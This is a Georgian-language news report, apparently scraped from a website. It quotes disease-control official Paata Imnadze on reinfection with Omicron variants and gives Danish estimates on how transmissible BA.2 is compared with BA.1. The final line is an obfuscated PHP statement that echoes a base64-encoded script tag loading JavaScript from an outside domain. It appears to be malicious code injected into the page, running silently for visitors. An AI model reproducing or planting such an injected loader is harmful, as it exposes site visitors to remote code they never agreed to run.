celsiusi
ავერსი საქკაბელი
დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორის მოადგილე, პაატა იმნაძე აცხადებს, რომ ომიკრონს ახასიათებს ამავე შტამის მეორე ვარიანტით რეინფიცირება. ამის შესახებ იმნაძემ ტელეკომპანია “ჯორჯიან თაიმსის” ეთერში განაცხადა.
 
“ომიკრონის შემდგომ რეინფიცირება იმ ქვეყნებში, სადაც ჩვენზე ადრე გავრცელდა… უკვე აღწერილია ომიკრონით რეინფიცირების შემთხვევები. ჩვენ ხომ ვიცით, რომ ომიკრონის ორი ვარიანტი დადის ძირითადად, შეიძლება პირველი ვარიანტი გადაიტანო და შემდეგ მეორე ვარიანტი დაგემართოს. ეს სხვა ქვეყნებში, სამწუხაროდ, უკვე აღწერილია”, – განმარტა იმნაძემ.
 
მისი თქმით, ის ადამიანები, ვისაც კორონავირუსის დელტა ვარიანტი ჰქონდათ, შესაძლოა ომიკრონით დაინფიცირდნენ. ომიკრონით ინფიცირების შემდეგ დელტა შტამით დაინფიცირების შემთხვევებზე კი ამ დროისთვის სამედიცინო კვლევები არ გამოქვეყნებულა.
 
მსოფლიოში ომიკრონის ორი ვარიანტი, BA.1 და BA.2, დომინანტურად ცირკულირებს. ზოგიერთი კვლევის თანახმად BA.2 ვარიანტი BA.1 ვარიანტთან შედარებით მეტად გადამდებია. Reuter-ის ცნობით, დანიის ჯანდაცვის უწყებები ვარაუდობენ, რომ BA.2 შესაძლოა 1.5-ჯერ მეტად გადამდები იყოს, ვიდრე BA.1 ვარიანტი, თუმცა, წინასწარი მონაცემებით, BA.2 ვარიანტის მიმდინარეობა ნაკლებად მძიმეა.
1227
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");